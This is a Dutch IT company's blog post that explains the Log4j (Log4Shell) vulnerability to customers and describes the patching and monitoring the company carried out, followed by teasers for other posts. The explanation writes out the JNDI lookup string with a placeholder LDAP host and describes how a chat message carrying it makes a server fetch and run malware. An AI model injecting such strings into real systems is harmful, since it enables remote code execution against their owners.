Log4j beveiligingslek

Waarschijnlijk heeft u in de media afgelopen weken wel het één en ander voorbij zien komen. Er is een kritieke kwetsbaarheid gevonden in wereldwijd gebruikte software waar u waarschijnlijk nog nooit van gehoord heeft Log4j. Daarom eerst wat uitleg;

Log4j is in een gigantische hoeveelheid platformen, apps en diensten verwerkt. Software van Cisco, IBM, VMware, Fortinet en Red Hat zijn enkele voorbeelden. De precieze toepassing van de library verschilt, maar de registratie van gebeurtenissen in applicaties speelt altijd een rol. Denk aan het noteren van inlogpogingen of de identiteit van de gebruiker van een applicatie.

De applicatie verwerkt een gebeurtenis; Log4j draait data uit. De programmeur van de applicatie bepaalt welke data. Dat kan zoals eerdergenoemd de gebruikersnaam van een gepoogde inlog zijn. Of de tijd waarop een gebruiker inlogt.

De kwetsbaarheid waarop Alibaba’s securityteam stuitte (zij hebben het ontdekt) komt voort uit een wisselwerking tussen programmeertaal Java en library Log4j. Java is in combinatie met Log4j in staat om code in een server op afstand uit te voeren. Daarvoor geven programmeurs de volgende regel mee: ${jndi:ldap://voorbeeld.com/vaneenurl}. De daadwerkelijke url is vervangbaar met het adres van een server naar keuze. Voer je de regel in een Java-applicatie uit, dan probeert de applicatie de data van de gespecificeerde url uit te voeren.

Dit is geen kwetsbaarheid op zich, want in een wenselijk praktijkscenario’s heeft alleen een gemachtigde administrator de mogelijkheid om de regel in een applicatie toe te voegen. Het probleem begint bij Log4j. Draait Log4j de regel uit, dan interpreteert Java precies dezelfde opdracht als een regel die doelgericht door een ontwikkelaar in de applicatie is geplaatst.

Stel dat Log4j is ingesteld om de inhoud van een chatbericht op een online spel te loggen. Een gebruiker van het spel verstuurt de bovengenoemde regel in een chatbericht. De url verwijst naar een server met instructies voor de uitvoering van een malware-applicatie. Log4j draait de regel uit. Java interpreteert een opdracht – en volgt de opdracht netjes op. De gebruiker slaagt in het hacken van de server, zonder ook maar een enkel wachtwoord te hoeven bemachtigen.

Ook heeft het Nationaal Cyber Security Centrum (NCSC) waarschuwt  (onderdeel van het ministerie van Justitie en Veiligheid) dat de computersystemen van bijna alle bedrijven en instellingen mogelijk geraakt kunnen worden. Natuurlijk hebben wij hier direct actie op ondernomen.

Wij zijn voor onze klanten, waarvan wij actief hun ICT omgeving beheren, de afgelopen weken heel druk bezig geweest met het in kaart brengen van de problematieken en het inventariseren van mogelijke risico’s. In gevallen waar de betreffende kwetsbaarheid mogelijk (vroeg of laat) van toepassing kan zijn, hebben wij in overleg en afstemming met applicatieleveranciers en softwareleveranciers, de benodigde maatregelen getroffen om dit Log4J lek te dichten. Ook heeft onze monitoring een extra update gekregen welke scant op het kunnen misbruiken van het Log4j beveiligingslek en zijn onze managed firewalls uitgerust met de juiste update definities om een dergelijke aanval te detecteren en blokkeren.

Uiteraard blijft het zaak in de huidige wereld, met toenemende cyber-dreiging, om scherp te blijven en zorg te dragen voor juiste beveiligingsmaatregelen, bewustzijn bij personeel en actief beheer van uw ICT omgeving. Twijfelt u of Log4j binnen uw omgeving voor schade kan zorgen of bent u benieuwd naar welke maatregelen er te nemen zijn om ‘de beveiligingsdrempel’ hoger te leggen, dan kunt u natuurlijk (#superlogisch) een beroep doen op Analyst ICT.

Laatste blogs

IOS26
Blog
iOS 26: Een Nieuwe Naam, een Nieuw Tijdperk
Apple heeft onlangs iOS 26 onthuld, en dat is niet zomaar een reguliere update. Met deze release slaat Apple een compleet nieuwe weg in — letterlijk én figuurlijk. De sprong van iOS 18 naar iOS 26 is geen typefout, maar een bewuste keuze die symbool staat voor een fundamentele verandering in hoe we het mobiele besturingssysteem van Apple moeten begrijpen. Van jaarlijkse updates naar een nieuw paradigma Volgens Apple is het tijdperk van jaarlijkse, incrementele updates voorbij. iOS 26 markeert het begin van een nieuw tijdperk waarin het besturingssysteem nauwer aansluit bij visionOS — het OS van de Apple Vision…
microsoft solutions partner modern work
Nieuws
Analyst ICT wederom erkend als Microsoft Solutions Partner voor Modern Work
Met trots mogen wij melden dat Analyst ICT opnieuw is erkend als Microsoft Solutions Partner voor Modern Work. Deze status bevestigt onze inzet voor het leveren van hoogwaardige, superlogische, moderne werkplekoplossingen die organisaties helpen om slimmer, efficiënter en veiliger samen te werken. De erkenning als Solutions Partner betekent dat wij voldoen aan de strenge eisen van Microsoft op het gebied van klanttevredenheid, technische expertise en succesvolle implementaties van Microsoft 365-oplossingen. Denk hierbij aan Microsoft Teams, SharePoint, Exchange Online en Intune – allemaal tools die wij dagelijks inzetten om onze klanten te ondersteunen in hun digitale transformatie. Als Solutions Partner kunnen wij…
NIS2 richtlijn
Nieuws
Waarom Analyst ICT werkt aan NIS2 certificering
Bij Analyst ICT zijn we trots op onze bestaande certificeringen: ISO 27001, ISO 9001 en NEN7510. Deze certificeringen tonen aan dat we voldoen aan internationale normen voor informatiebeveiliging, kwaliteitsmanagement en zorginformatieveiligheid. Maar we stoppen niet daar. We zijn hard aan het werk om ook NIS2-certificering te behalen, en de eerste stappen zijn al gezet. Zo tonen als bewijs dat wij actief werken aan het verkrijgen van de volledige NIS2 Quality Mark Certificering. Dit laat zien dat wij het naleven van de NIS2-richtlijnen en het waarborgen van de veiligheid van onze systemen en gegevens als een superlogische stap beschouwen. Wat is…

Een nieuwsbrief

Superlogisch toch?